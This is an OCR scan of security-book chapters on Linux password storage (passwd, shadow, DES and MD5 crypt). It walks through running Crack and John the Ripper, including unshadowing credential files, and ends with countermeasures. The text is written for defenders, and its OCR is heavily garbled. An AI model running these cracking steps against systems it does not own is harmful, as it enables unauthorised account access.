Finjan's is an interesting technology that pushes management of the mobile code 
problem away from overwhelmed and uninformed end users. Its sandbox technology 
has the additional advantage of being able to prevent attacks from PE (portable execut- 
able) compressors, which can compress Win32 .EXE files and actually change the binary 
signature of the executable. The resulting compressed executable can b5q)ass any static 
antivirus scanning engine because the original .EXE file is not extracted to its original 
state before it executes. (Thus, traditional antivirus signature checking won't catch it.) Of 
course, it is only as good as the policy or sandbox security parameters it runs under, 
which are still configured by those darned old humans responsible for so many of the 
mistakes we've covered in this chapter. 



SUMMARY 

After writing this chapter, we simultaneously wanted to breathe a sigh of relief and to 
embark on years of further research into Internet user hacking. Indeed, we left a lot of 
highly publicized attack methodologies on the cutting room floor, due primarily to ex- 
haustion at attempting to cover the scope of tried and untried attacks against common cli- 
ent software. In addition to dozens of other clever attacks from individuals like Georgi 
Guninski, some of the topics that barely missed the final cut include web-based mail ser- 
vice hacking (Flotmail), AOL user hacking, broadband Internet hacking, and hacking 
consumer privacy. Surely, the Internet community will be busy for years to come dealing 



Hacking Exposed: Network Security Secrets and Solutions 



692 



with all of these problems and those as yet unimagined. Here are some tips to keep users 
as secure as they can be in the meantime. 

T Keep Internet client software updated! For Microsoft products often targeted 
by such attacks, there are several ways (in order of most effective use of time): 

■ Windows Update (WU) at http: / / www.windowsupdate.com 

■ Microsoft Security Bulletins at http:/ / www.microsoft.com/technet/ 
security / current. asp 

■ Critical IE Patches at http : / / www.microsoft.com / windows /ie / download / 
default.htm#critical 

■ Office Products Security Patches at http: / / office.microsoft.com 

■ Obtain and regularly use antivirus software. Make sure the virus signatures are 
kept updated on a weekly basis, and set as many automated scanning features 
as you can tolerate. (Automatic scarming of downloaded email is one that 
should be configured.) 

■ Educate yourself on the potential dangers of mobile code technologies like ActiveX 
and Java, and configure your Internet client software to treat these powerful tools 
sensibly. (See our discussion of Windows security zones in this chapter to learn 
how to do this.) A good introductory article on the implications of mobile code 
can be found at http: / / www.computer.org/ internet/ v2n6/ w6gei.htm. 

■ Keep an extremely healthy skepticism about any file received via the Internet, 
whether as an email attachment or as an offered DCC on IRC. Such files should 
immediately be sent to the bit bucket unless the source of the file can be verified 
beyond question (keeping in mind that malicious worms like the ILOVEYOU 
worm can masquerade as email from trusted colleagues by hijacking their 
client software). 

A Stay updated on the latest and greatest in Internet client hacking tools and 
techniques by frequenting these web sites of the people who are finding the 
holes first: 

■ Georgi Guninski at http:/ / www.guninski.com/index.html 

■ Princeton's Secure Internet Programming (SIP) Team at 
http: / /www.cs.princeton.edu/sip/history/index.php3 

■ Juan Carlos Garcia Guartango at http:/ / www.kriptopolis.com 
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P assword security is one of the most important security measures to implement for 
your Linux system. Without strong password security, your system will never be 
safe. A hacker who manages fo compromise a firewall (see Chapfer 13) can affempf 
fo log in as a user and gain access fo machines on the network. However, if all your users 
have sfrong passwords, you sfand a good chance of foiling the hacker's illegal attempts to 
break into your network. 

This chapter describes how passwords work, what hackers try to do to crack them, 
and what measures you can take to protect yourself. 



HOW PASSWORDS WORK IN LINUX 

Linux passwords are sfored on fhe machine in encr)^fed form. Encr 5 ^fion involves con- 
verting a text string, based on a repeatable algorithm, into a form thaf is very differenf 
from fhe original string. The algorithm must be repeatable so that when you log in, Linux 
can take your password and reproduce the encr 5 ^ted form thaf it stores. 

For instance, if your password is 

HelloWorld 

fhe value sfored on fhe Linux machine mighf resemble 

aaOBUOESufwxk 




“HelloWorld” is a very bad password! For information on what makes a password good or bad, 
see “Password Protection,” iater in the chapter. 



Linux uses a one-way encryption algorithm. You can encrypt a password, but you can- 
not generate a password from an encrypted value. You can only try to guess passwords 
based on a dictionary attack or a brute force attack, which we discuss later in the chapter. 



/etc/passwd 

Most early versions of Linux stored passwords in an encrypted form in the file /etc/ 
passwd. During the login process, a user is asked for a username and password. The oper- 
ating system takes the username and looks up that user's record in /etc/passwd to obtain 
his encrypted password. Then, the username and password are passed into an encryption 
algorithm function named crypt { ) to produce the encrypted password. If the result 
matches the encrypted password stored in / etc/passwd, the user is allowed access. 

Here is an example of /etc/passwd: 

[ jdoeSmachinel jdoe]$ cat /etc/passwd 
root : aleGVpw jgvHGg : 0 : 0 : root : /root : /bin/bash 
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bin:*:l:l:bin:/bin: 
daemon : * : 2 : 2 : daemon : / sbin : 
adm: * : 3 : 4 : adm: /var/adm: 

Ip : * : 4 : 7 : Ip : /var/spool/lpd : 
sync:*:5:0:sync:/sbin:/bin/sync 
mail : * : 8 : 12 :mail : /var/spool/mail : 
news : * : 9 : 13 : news : /var/ spool/ news : 

UUCP : * : 10 : 14 : UUCP : /var/spool/uucp : 

gopher : * : 13 : 30 : gopher : /usr/lib/gopher-data : 

ftp : * : 14 : 50 : FTP User : /home/ ftp : 

nobody :*:99:99:Nobody:/: 

xf s : * : 100 : 101 : X Font Server : /etc/Xll / fs : /bin/ false 

jdoe : 2bTlcMw8zeSdw : 500 : 500 : John Doe : /home/ jdoe : /bin /bash 

student : 9d9WE322 : 501 : 100 : : /home/ student : /bin/bash 

Each line in /etc/passwd is a colon-separated record. The fields in /etc/passwd 
represent 

T The username 

■ The encr)^ted password 

■ The user ID number 

■ The group ID number 

■ A comment about the user (often the user's name) 

■ The home directory 
A The default shell 

Notice that the encr)^ted password is in view in the second field in fhe record: 

jdoe : 2bTlcMw8zeSdw : 500 : 500 : John Doe : /home/ jdoe : /bin/bash 

This file is readable by all users: 

[ jdoe0machinel jdoe]$ Is -1 /etc/passwd 

-rw-r — r — 1 root root 842 Sep 12 16:24 /etc/passwd 

The facf that the encrj^ted passwords are viewable by everyone leaves the system 
vulnerable to a password attack. The term password attack is a broad term, but it generally 
means any attempt to crack, decrj^t, or delete passwords. A deleted password is one that 
is blank; this is as good as a decrj^ted password since the password is simply the ENTER 
key. Recall that Linux uses a one-way encrj^tion algorithm: given an encrypted version 
of a password, the password carmot be derived. However, if someone has an encrj^ted 
version of a password, an attempf can be made to guess the password. 
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Linux Encryption Algorithms 

An encryption algorithm is a repeatable formula to convert a string into a form that is 
unrecognizable and very different from the original. There exist many different en- 
cryption algorithms, from very simple and easy to decrypt to very complicated and 
virtually impossible to decrypt. As an example, let's look at one of the simplest en- 
cryption algorithms — rotl3. 

Rotl3, or rotate 13, is an algorithm that takes a string and rotates the uppercase and 
lowercase alphabetic characters 13 character positions: 



a ^ n 
b ^ o 

m ^ z 
n^ a 
o ^ b 

z ^ m 



A^N 

B^O 

M^Z 

A 

O^B 

Z^M 



Given the string 
Hello, world 
the rotl3 encr)^ted result is 

Uryyb, jbeyq 

The rotl3 algorithm satisfies the first requirement of an encr)q)tion algorithm: it is 
repeatable ("Hello, world" always encr)q)ts to "Uryyb, jbeyq"). However, it is not an ef- 
fective algorithm because the encr}q)ted form is too similar to the original form, and the 
original is easily generated given the encr)q)ted form: simply rotate the encrypted form 
again, and the original is re-created. Therefore, rotl3 is not a one-way encryption algo- 
rithm and is not appropriate for Linux password encryption. 

There are two algorithms used in Linux to encrypt passwords: DBS and MD5. They 
are effective encr)q)tion algorithms because they are repeatable and virtually impossible 
to crack in a reasonable amount of time (given a strong enough encryption key). 



xoTii; 



MD5 is technically a hash algorithm, not an encryption algorithm. However, like DES, it converts the 
password into a form that is not decryptable. 
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The DES Algorithm 

The Data Encryption Standard (DES) is one algorithm used to encr 5 ^t Linux passwords. 
DES was developed by the U.S. government and IBM. DES is implemented by crypt ( 3 ) 
and is the UNIX standard. 

The crypt ( 3 ) function takes two arguments: key and salt. The key is the user's pass- 
word, and the salt is a two-character string chosen from fhe set [a-zA-ZO-9./]. The user's 
key is limited to a length of eighf characfers, and fhe lowest 7 bits of each byfe of the 
user's key is used to create a 56-bit key. This 56-bit key is used to encrypt a constant 
string (usually a string consisting of all zeroes), generating a 13-character string that is 
returned by crypt ( 3 ) . 




Since the user’s password is the key used in the encryption aigorithm (the vaiue is a string of zeroes), 
the key must be known to decrypt the resuit. Since the key is not known (it shouid not be known since it 
is a user’s Linux password), the resuit is un-decryptabie by any known function. Hence, crypt ( 3 ) 
impiements a one-way encryption aigorithm. 



The result of the crypt ( 3 ) function is a string in which the first two characters are 
the salt itself. The resulf has fhe following format: 

T It is 13 characters in length. 

A The characters are either alpha, digit, underscore, period, or dash: 

a-zA-Z0-9_.- 

Eor example, if the salt is the string "Al" and the user's password is "MyPass," the 
crypt { 3 ) function will return 

AlqLrZpFD . Ddw 

Notice that the first two characters of fhe string, "Al," make up the salt used to generate 
the result. 

If fhe improbable happens and two users have the same password, "MyPass," the 
chance of them having the same salt is 1 in 4096; therefore, the result of fhe crypt ( 3 ) 
function for these two users will probably be different. As an example, if anofher user has 
fhe same password, "MyPass," and her salf is "A2," fhe resulf of crypt ( 3 ) would be 

A2 . I0Myq3Nf .U 

Notice that this result of encrypting "MyPass" is quife differenf from the previous result 
using a different salt. 
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Here is a Perl script that asks the user for a salt and a password, and passes the two 
values into the crypt ( 3 ) function to compute the encrypted value: 

# ! /usr /bin/perl 

# crypt.pl 

use strict; 

print 'Please enter your salt: 
my $salt = <STDIN>; 
chomp $salt; 

print 'Please enter your password: '; 

my $passwd = <STDIN>; 
chomp $passwd; 

print 'The result is: ', crypt ( $passwd, $salt) , "\n"; 

Here is an example of execufing fhis program: 

[ jdoe0machinel perl]$ ./crypt. pi 
Please enter your salt : x7 
Please enter your password: lAmGod 
The result is: x7Se2vAt4SqKQ 




Since DES was developed in part by the U.S. government, it is not exportable outside the 
United States. 



The MD5 Algorithm 

MD5, a hash algorithm, improves upon fhe use of DES in many ways: 

T Infinite length passwords They are not limited to eight characters. 

■ Much larger keyspace Here is an example of fhe oufpuf of MD5: 

$l$rVh4/3C/$ .xtBPA85bzw/2qBTOYY/R. 

If is much longer than 13 characters, and the legal characters include 
punctuation and other characters. 

A Exportable It was not developed in part by the U.S. government, so it 
can be exported outside the United States. 

The following Perl script illustrates an implementation of MD5: 



# ! /usr /bin/perl -w 

# md5.pl 
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use strict; 
use MD5; 



print 'Please enter your password: 
ray $passwd = <STDIN>; 
chomp $passwd; 



my $md5 = new MD5; 

$md5->add ( $passwd) ; 
my $digest = $md5->digest ( ) ; 

print ( "Result is ", unpack ("H*", $digest), "\n"); 

Here is an example of executing this program: 

[ jdoe0machinel perl]$ ./nidS.pl 

Please enter your password: lamGod 

Result is d8c653b74da4841b95bl7d38a68f20cb 




It is extremely unlikely, but possible, for two different passwords to generate the same encrypted text 
for MD5. 



PASSWORD CRACKING PROGRAMS 

Password cracking describes the act of guessing passwords in an attempt to gain access to a 
computer. Most password cracking strategies involve selecting common words from a dic- 
tionary (called a dictionary attack) or common patterns used (such as testingl23). The 
steps hackers will take to try to crack passwords usually involve obtaining a copy of 
/etc/passwd and then executing a program remotely on their machine that guesses pass- 
words, in an attempt to produce the encrypted form of the password stored in that file. 

The brute force method involves repeated attempts to log in. The hacker will use a 
username (like root) and begin the brute force attempt at guessing the password — per- 
haps starting with "aaaaaa," then "aaaaab," then "aaaaac," and so on. This ty^e of attack 
does not require a copy of the encrypted passwords — merely a lot of patience and suffi- 
cient time. However, it is easy to see evidence of such an attack because this method will 
leave trails in the system log hies. And you do check your logs, don't you? 

Here is an example of the Linux log file /var/ log /mess ages showing evidence of 
a brute force attack: 

Nov 6 15:49:27 machinel login[1699] : FAILED LOGIN 1 FROM localhost FOR root, 
Authentication failure 

Nov 6 15:49:32 machinel login[1699]: FAILED LOGIN 2 FROM localhost FOR root, 
Authentication failure 

Nov 6 15:49:37 machinel login[1699] : FAILED LOGIN 3 FROM localhost FOR root. 
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Authentication failure 

Nov 6 15:49:41 machinel login[1699]: FAILED LOGIN SESSION FROM localhost FOR 
root, Authentication failure 

Nov 6 15:49:41 machinel PAM_pwdb [ 1 6 9 9 ] : 3 more authentication failures; (uid=0) 
-> root for login service 

Nov 6 15:49:41 machinel PAM_pwdb [ 1 6 9 9 ] : service (login) ignoring max retries; 

4 > 3 

Performing a dictionary attack or a brute force attack by hand is tedious and time con- 
suming. However, most hackers will not perform these attacks by hand; instead, they 
will use one of the available open source password cracking programs. We will look at 
two popular ones: Crack and John the Ripper. 



V Crack 



Popularity: 


10 


Simplicity: 


9 


Impact: 


9 


Risk Rating: 


9 



Crack is one of the best known UNIX password cracking programs. You could call it 
the father of all password crackers. It is considered the standard by which other pass- 
word cracking programs are measured. It was written by Alec D. E. Muffet, a UNIX engi- 
neer from Wales. In Alec's words: "Crack is a freely available program designed to find 
standard UNIX eight-character DES encr 5 ^ted passwords by standard guessing tech- 
niques. It is written to be flexible, configurable, and fast." 

Installing Crack 

The following example was performed on an installation of RedHat Linux version 6.2. 
Most Linux distributions will follow similar installation steps. 

Eirst, download the latest version (currently 5.0a) from 

http : / /www .users . dir con . co . uk/~ crypto /index . html 

Next, unzip and untar the tarball: 

[ jdoeSmachinel /tmp] # tar xzf crackS . 0 . tar . gz 

Change directory into the new directory named c50a: 

[ jdoe0machinel /tmp]# cd c50a 

The next step is to compile Crack. If an MD5-based version of crypt ( ) is being used 
(which is the case with Red Hat 6.2), it is necessary to do the following: 
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[ jdoe0machinel c50a] # mv src/libdes src/libdes , orig 

[ jdoe0machinel util]# cd src/util 
[ jdoe0machinel util]# cp -f elcid.c,bsd elcid.c 

[ jdoe0machinel c50a] # cd 

The program to build and execute Crack is named Crack. Crack was written to work 
both with the DBS version of crypt ( ) and the MD5 version of crypt ( ) , and there is a 
section ofcode in Crack that indicates which version is being used .Crack defaults to the 
DBS algorithm, and since Red Hat 6.2 uses MD5, there is a small modification necessary 
to make it work for Red Hat. Here are the lines that you will see in Crack: 

# vanilla unix cc 
CC=cc 

CFLAGS="-g -0 $C5FLAGS" 

#LIBS=-lcrypt # uncomment only if necessary to use stdlib crypt (), eg: NetBSD MD5 

# gcc 2.7.2 
#CC=gcc 

#CFLAGS="-g -02 -Wall $C5FLAGS" 

#LIBS=-lcrypt # uncomment only if necessary to use stdlib crypt O, eg: NetBSD MD5 

Change those lines to the following: 

# vanilla unix cc 
#CC=cc 

#CFLAGS="-g -0 $C5FLAGS" 

#LIBS=-lcrypt # uncomment only if necessary to use stdlib crypt {), eg: NetBSD MD5 

# gcc 2.7.2 
CC=gcc 

CFLAGS="-g -02 -Wall $C5FLAGS" 

LIBS=-lcrypt # uncomment only if necessary to use stdlib crypt (), eg: NetBSD MD5 

Notice that we are no longer using vanilla UNIX — you can't accuse Linux of being 
a vanilla operating system. 

Now, Crack can be compiled: 

[ jdoe0machinel c50a] # ./Crack -makeonly 

Now, create the dictionaries (this can take some time): 

[ jdoe0machinel c50a] # ./Crack -makedict 

When Crack is finished making ifs dicfionaries, you will see this output: 



Crack: Created new dictionaries... 
Crack: makedict done 
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Running Crack 

To attempt to crack /etc/passwd, execute Crack like this: 

[ jdoe0machinel c50a] # ./Crack /etc/passwd 

Or, if you like, copy / etc/passwd into the directory where you are rurming Crack: 

[ jdoeSmachinel c50a] # cp /etc/passwd passwd.txt 

Note, this will not copy a crackable /etc/passwd if you are using eifher NIS or shad- 
owed passwords. If you are rurming NIS, one way fo generafe a crackable file is fo execufe 

[ jdoe0machinel c50a] # ypcat passwd > passwd.txt 

If you are using shadow passwords (fo be covered lafer in fhe chapfer), fhere is 
a scripf named shadmrg.sv included in fhe Crack disfribufion fhaf will generafe a 
crackable password file. 



Since this crackabie password file will contain the encrypted passwords, be sure to make this file 
readable only by root. 

[root0machinel c50a] # script s / shadmrg . sv > passwd.txt 

[root0machinel c50a]# chmod 600 passwd.txt 

Now it is time to run Crack. Execute the Crack program, passing as the argument the 
password file: 

[ jdoe0machinel c50a]# ./Crack passwd.txt 

Crack will generate several lines of output ending in 

Crack: launching: cracker -kill run/Kmachinel . 1572 
Done 

Crack has launched the cracker program in the backgroimd. To verify this: 

[ jdoe0machinel c50a]# ps ax | grep crack 

1661 pts/1 RN 0:28 cracker -kill run/Kmachinel . 1572 

Crack creates a file in the directory named run that is a log file of its progress. You can 
watch the progress by tailing this file: 

[ jdoe0machinel c50a] # tail -f run/Dmachinel . 1572 

0:967256300:673 

I : 967256300 : LoadDictionary : loaded 0 words into memory 
I : 9 6725 6300 : OpenDictStream : trying: kickdict 674 

I : 9 6725 6300 : OpenDictStream : status: /ok/ stat=l look=674 find=674 
genset= ' conf /rules . perm4 ' rule='/oso0/sss$/asa4/hs'41' dgrp= ' gcperm ' 
prog= ' smartest run /diet/ gcperm . * ' 

0:967256300:674 
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I : 96725 6300 : LoadDict ionary : loaded 0 words into memory 
I : 96725 6300 : OpenDictStream : trying: kickdict 675 

I : 96725 6300 : OpenDictStream : status: /ok/ stat=l look=675 find=675 
genset= ' conf /rules . fast ' rule= ' : ' dgrp= ' 1 ' prog= ' smartest run/dict / ' . * ' 
0:967256300:675 

I : 967256307 : LoadDictionary : loaded 166811 words into memory 

Depending on the number of users in your password file and how good fheir pass- 
words are. Crack can fake a long time to run. Also, if execufed withouf n i ce, if can utilize 
a large percenfage of the CPU. This output from the top command shows how much of 
fhe CPU Crack can utilize: 

[ jdoe0machinel c50a]# top 

PID USER PRI NI SIZE RSS SHARE STAT LIB %CPU %MEM TIME COMMAND 



268II jdoe 18 5 3864 3864 340 R N 0 97.4 1.4 4:56 cracker 

Notice fhaf if is consuming 97.4 percenf of fhe CPU. Also, Crack can read from and 
wrife fo fhe disk quife a bif. 




It is not uncommon for a user to run Crack on your machine. If you notice that your machine is siuggish 
or is excessiveiy accessing the disk, execute the top (or simiiar) command to monitor your pro- 
cesses. If you see Crack running, you may want to take corrective action. 



Cracking Passwords on More Than One Machine Crack can be run as a ctisfnhMfed process. In 
other words, it is possible to distribute Crack's load across hosts on a network or among 
several processors on a single machine. In Crack 5.0, this functionality requires Perl in- 
stalled on the master machine. Almost all Linux distributions have Perl installed. 

To rim Crack as a distributed process: 

1. Edit conf/ network .conf. 

This file contains lines that have the following form: 

host : relpow : nf sbool : rshuser : crackdir 

Where: 

■ host is the name of the host to which Crack should rsh. 

■ relpow is an arbitrary measure of the host's power; used by Crack to 
decide how to divide the workload evenly according to ability. 

■ nf sbool determines whether the remote host shares the Crack filestore; 
defaults to "y." 

■ rshuser is a username for the rsh command (optional). 

■ crackdir is the remote host directory that contains Crack (required). 

2. Execute Crack -network [other flags] filename . . . 
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Email Option Crack has an option to send email to any user whose password is cracked: 

[ jdoeSmachinel c50a] # ./Crack -mail passwd.txt 

This option will send the contents of script s /nastygram to all the users who have pass- 
words cracked by Crack. You can modify fhis scripf fo send a message fo fhe users who 
have poor passwords and use if fo inform and educafe fhem on fhe use of good passwords. 

The reason for sending email fo fhose users who have had fheir weak passwords 
cracked is fhaf fhey will change fhem fo sfrong passwords. However, fhere is a good rea- 
son not fo send fhis email: if may be infercepfed in fransif by a hacker who will fhen know 
fhaf fhe user has a weak password. The hacker can fhen fry fo crack fhe user's password, 
log in, and change fhe password himself, or do worse damage. Perhaps a beffer approach 
fo dealing wifh weak passwords is simply fo lock ouf users and affempf fo confacf fhem 
or, if convenienf, waif for fhem fo confacf you. 

Viewing Results To view the result of Crack, use the provided Reporter program: 

[ rootSmachinel c50a]# ./Reporter 



passwords cracked as of Mon Sep 11 12:52:11 CDT 2000 

Guessed student [student] [passwd.txt /bin/bash] 

Guessed jdoe [john] [passwd.txt /bin/bash] 

Guessed root [lAmGod] [passwd.txt /bin/bash] 

Here we see that Crack has cracked three of our users' passwords. 




The root user’s password was not difficult to guess. In reality, root’s password should be excep- 
tionally strong. This is the last user that you want to be compromised on your machine. 



An Important Note Regarding Crack 



Be sure to check out the help file on the Crack web site. It has many helpful hints and 
directions, as well as a FAQ section. One question in particular deserves a mention, 
and this is quoted from the FAQ: 

How do I run Crack under DOS/Win95? 

Reformat your hard-drive and install Linux, then try again. CAUTION: This 
process may lose data. 
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V John the Ripper 



Popularity: 


9 


Simplicity: 


9 


Impact: 


9 


Risk Rating: 


9 



Another more recent password cracking program is John the Ripper. John is faster 
than Crack and has a few additional features: 

T It is designed to be fast and powerful. 

■ It cracks standard and double-length DBS, MD5, and Blowfish algorithms. 

■ It uses its own internal and highly optimized modules instead of crypt ( 3 ) . 

■ You can suspend and restart a session. 

■ It is available for different platforms, so a program started on one machine 
can be resumed on a different machine. 

■ You can specify your own lisf of words and rules fo use. 

■ You can get the status of an interrupted or running session. 

A You can specify which users or groups to crack. 

Installing John the Ripper 

Visit the official John web sife: 

http : / /www . openwall . com/ john/ 

The latest source at the time of this book is version 1.6. So download the file 
john-1 . 6 . tar . gz. Now unzip and untar the source: 

[ jdoe0machinel john] $ tar xzf john-1 . 6 . tar . gz 

Next, change into the new directory, go into the src directory, and make the 
program: 

[ jdoeSmachinel john] $ cd john-1. 6 
[ jdoeSmachinel john-1. 6] $ cd src 
[ jdoeSmachinel src] $ make linux— x86— any— elf 

This will create the binary named r un / john. The run directory can be copied any- 
where since it contains all the files thaf j ohn needs in order fo run. 



Hacking Linux Exposed: Linux Security Secrets 8i Solutions 



Running John the Ripper 

Execute john by passing it a password file on the command line, usually a copy of 

/ etc/passwd. 




If shadowed passwords are being used (to be discussed iater in the chapter), the encrypted passwords 
can be obtained by executing the unshadow program distributed with john. Since /etc/ 
shadow is oniy readabie by root, oniy the root user can execute unshadow. 




Since the fiie you create here wiii contain the encrypted passwords, be sure to make this fiie readabie 
oniy by root. 



[ root0machinel run] $ unshadow /etc/passwd /etc/shadow > passwd.txt 

[ root0machinel run] $ chmod 600 passwd.txt 



Cracked passwords will be printed to the terminal and also saved to the file named 
run/ john . pot. An example of running john and the output that john creates is 
shown here: 



[ jdoe0machinel run] $ john passwd.txt 

Loaded 3 passwords with 3 different salts (FreeBSD MD5 [32/32]) 
jdoe (john) 

student (student) 




If and when john is run again, john looks in john. pot, and if a cracked password is found, it 
does not try to crack it again. 



While john is running, press any key for the current status: 

guesses: 2 time: 0:00:02:50 (3) c/s: 1532 trying: 2bdo 



Typing CTRL-C will suspend john. Typing CTRL-C twice will abort without saving. 
Also, john will save its current status every 10 minutes to a file named run/ john . ini 
so thaf if the system crashes in the middle of a run, john can be resumed. (This feafure is 
obviously designed for fhe Windows crowd.) 

To resume an interrupfed session: 

[ jdoe0machinel run] $ john -restore 

To retrieve the cracked passwords: 

[ jdoe0machinel run] $ john -show passwd.txt 

jdoe : john : 500 : 500 : John Doe : /home/ jdoe : /bin/bash 
student : student : 501 : 100 : : /home/student : /bin/bash 



2 passwords cracked, 1 left 
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To retrieve a specific user's cracked password: 

[ jdoeSmachinel run]# john -show -users :jdoe passwd.txt 

jdoe : john : 500 : 500 : John Doe : /home/ john : /bin/bash 

1 password cracked, 0 left 

There are many other ways to run john. See the file doc /EXAMPLES in the John 
distribution for more details. 

John’s Modes 

John's modes can be enhanced by definitions in run/ john .ini. This file contains many 
rules and modes that users can create and enhance. The modes that j ohn supports include: 

T Wordlist mode Allows you to specify a wordlist in FILE or one to be read 
from stdin. These words will be used to try to crack the passwords; you can 
also provide rules used to modify the words. 

[ jdoe@machinel run] john -wordf ile : FILE 
[ jdoe@machinel run] john -wordfile -stdin 

■ Single crack mode Uses login/ GECOS information as passwords — very fast. 

[ jdoe@machinel run] john -single 

■ Incremental mode Tries all possible character combinations. It is the most 
powerful mode, buf if can fake a long fime. 

[ jdoe0machinel run] john -incremental 

A External mode Allows external mode definitions using functions written in 
a C-like programming language. 

[ jdoe@machinel run] john -external 

Email Option 

Like Crack, John has the ability to send email to any user whose password is cracked: 

[ jdoeSmachinel run]# ./mailer passwd.txt 

This program will send an email message to all the users who have passwords cracked 
by John. 

Like the script Crack uses to send email to users with poor passwords, you can use the 
mailer program to inform and educafe users on the use of good passwords. 

Again, sending this email to a user with a weak password is potentially dangerous. 
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Other Cracking Programs 

Although Crack and John the Ripper are two of the most well known password crackers, 
there are a large number of cracking programs available. A good web sife fo visif fo find 
a long lisf of fhese programs is http:/ /packetstorm. security. com/. 

#'Viper 



Popularity: 


6 


Simplicity: 


10 


Impact: 


7 


Risk Rating 


7 



Viper (http: / / www.wilter.com/wf/) is a GUI-based Windows program fhaf performs 
a brufe force password affack of DBS/ crypt ( ) passwords. It takes as its input a line from 
eifher / etc/passwd or /etc/shadow (fo be covered lafer in fhe chapfer) and begins a 
brufe force affack using passwords from 1 fo 12 characfers in lengfh. Viper will check all 
passwords. If liferaUy checks from "a" fo "000000000000" and all possible combinations in 
between. It only checks alphas and digits, choosing to ignore punctuation and special char- 
acters. Since Viper is checking all possible combinations of alphas and digifs, if can fake a 
long time fo execufe — a really long time. If it checks all possible combinations of characfers 
in a sfring of lengfh 12, if musf check more fhan 3e21 passwords. Even on a fasf machine, 
fhis will fake a considerable amount of time. 

Viper is quife slow and hogs a lof of fhe processor as if is working. Moreover, affempf- 
ing fo iconify fhe window can fake several minufes. However, if is good fo know fhaf if is 
possible fo crack Linux passwords on ofher platforms if you find yourself wifhouf access 
fo a Linux machine (and finding yourself wifhouf access fo a Linux machine is one very 
good reason fo fry fo hack one). 



^lurpie 



Popularity: 


8 


Simplicity: 


8 


Impact: 


9 


Risk Rating: 


8 



Slurpie (hftp://www.jps.nef/coafi/archives/slurpie.hfml) is a password cracking 
program similar fo Crack and John the Ripper that can run in distributed environments. 
Since Slurpie can run on multiple computers at the same time, this can speed up the 
cracking progress considerably. 

Input to Slurpie is a password file and, optionally, a dictionary. Slurpie can be run on 
a single hosf or on multiple hosfs. To run on multiple hosts, simply build Slurpie on each 
machine and add each machine's IP to the hosts, dat file in the Slurpie distribution. 
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Q Password Cracking Countermeasures 

There are several measures you can take to protect your machine against a hacker trying 
to crack your passwords with a password cracking program: 

1. Rim the cracking programs yourself to find weak passwords on your machine. 

2. Make sure password files are nof readable. 

3. Check your log files. 

4. Use shadowed passwords (discussed lafer in fhe chapfer). 

Availability of Dictionaries 

Since a dictionary attack uses a lisf of words fo generafe passwords, fhe more comprehen- 
sive fhe lisf of words, fhe more likely fhe attack will be successful (if a user has a password 
based on a dictionary word). Therefore, if you are affempfing fo crack passwords, you 
should obfain one or more large dictionaries. Keep in mind fhaf a hacker will fry fo crack 
passwords using dictionaries in more fhan one language as well as dictionaries wifh rela- 
tively obscure words (such as scientific ferms). The following are resources wifh many 
high-qualify dicfionaries. 

Linux Dictionary 

A dictionary can be found on your Linux machine. On RedHaf version 6.2, if can be found 

af /usr/dict/words. 

Packetstorm 

This web sife (hffp:/ / packefsform.securify.com/) has a large number of dicfionaries and 
wordlisfs. You can find wordlisfs in differenf languages (for example, Chinese, Danish, 
and Ifalian) and on differenf topics (Biology, Colleges, and Surnames). Also, fhis web sife 
has links fo a large number of password cracking programs. 

Freie Universitat Berlin, Germany 

This is anofher web sife (ffp://ffp. fu-berlin.de/pub/unix/securify/dicfionaries/) wifh 
a large number of dicfionaries, including many differenf languages. 



SHADOW PASSWORDS AND /ETC/SHADOW 

Password shadowing is a way fo hide fhe encr 5 qifed passwords from view, fhus making 
dicf ionary attacks exfremely difficulf. The file / et c/pas swd still exisfs, buf anofher file 
named /etc/shadow is created. This file confains fhe encr 5 q)fed version of all pass- 
words on fhe sysfem and is only readable by root. Password shadowing is now consid- 
ered essenfial for password securify, so mosf currenf Linux disfribufions implemenf 
shadowed passwords. Using shadowed passwords is crifical; hiding fhe encrypfed 
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passwords from view is the most important step you can take to make a dictionary attack 
extremely difficult. 

This part of the chapter will describe password shadowing and demonstrate how to 
convert from unshadowed passwords to shadowed passwords. 

Shadow Passwords Explained 

If shadowing is used, the contents of / et c/pas swd would resemble 

root : X : 0 : 0 : root : /root : /bin/bash 
bin:x: 1 : 1 :bin: /bin : 
daemon : x : 2 : 2 : daemon : / sbin : 
adm : x : 3 : 4 : adm : /var /adm : 

Ip : X : 4 : 7 : Ip : /var /spool /Ipd : 
mail : X : 8 : 12 :mail : /var/ spool /mail : 
news : X : 9 : 13 : news : / var/ spool/ news : 

UUCP : X : 10 : 1 4 : UUCP : /var /spool /uucp : 

operator : x : 11 : 0 : operator : / root : 

gopher : x : 13 : 30 : gopher : /usr/ lib/gopher-data : 

f tp : x : 1 4 : 50 : FTP User : /home/ftp : 

nobody :x:99:99:Nobody:/: 

xf s : x : 1 00 : 1 01 : X Font Server : /etc/Xl 1 / fs : /bin/ false 
gdm : x : 42 : 42 : : /home/gdm : /bin /bash 

postgres:x:40:233:PostgreSQL Server :/var/lib/pgsql:/bin/bash 
jdoe : X : 500 : 500 : John Doe : /home/ jdoe : /bin/bash 
student:x:501:100: : /home /student :/bin/bash 

Note that the encr5^ted password field is now simply "x" (and that is not the en- 
crypted form). The contents of /etc/shadow are shown below: 

root : aleGVpw jgvHGg :11013:0:99999:7:-1:-1:134549444 
bin:*:11012:0:99999:7: : : 
daemon: * :11012:0:99999:7::: 
adm:*:11012:0:99999:7: : : 

Ip: * : 11012 : 0 : 99999 : 7 : : : 
mail :*:11012:0:99999:7::: 
news :*:11012:0:99999:7::: 
uucp:*:11012:0:99999:7: : : 
operator :*:11012:0:99999:7: : : 
gopher: * :11012:0:99999:7::: 
ftp:*:11012:0:99999:7: : : 
nobody: * :11012:0:99999:7::: 
xfs : ! ! : 11012 : 0 : 99999 : 7 : : : 
gdm: ! ! : 11012 : 0 : 99999 : 7 : : : 
postgres: ! ! :11012:0:99999:7: : : 

jdoe : 2bTlcMw8zeSdw: 11195 :0:99999:7:-l:-l:134549452 
student : 9d9WE322 :11195:0:99999:7:-1:-1:134549452 
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The fields in /etc/shadow represent 

T Username 

■ Encrypted password 

■ Number of days since January 1, 1970, that the password was last changed 

■ Number of days left before the user is permitted to change her password 

■ Number of days left until the user must change her password 

■ Number of days in advance that the user will be warned that she must change 
her password 

■ Number of days remaining for the user to change her password or the account 
will be disabled 

A A reserved field 

To show that the /etc/shadow file is readable only by root: 

[ jdoeSmachinel jdoe]$ Is -1 /etc/passwd /etc/shadow 

-rw-r — r — 1 root root 842 Sep 12 16:24 /etc/passwd 

-r 1 root root 759 Sep 12 16:24 /etc/shadow 

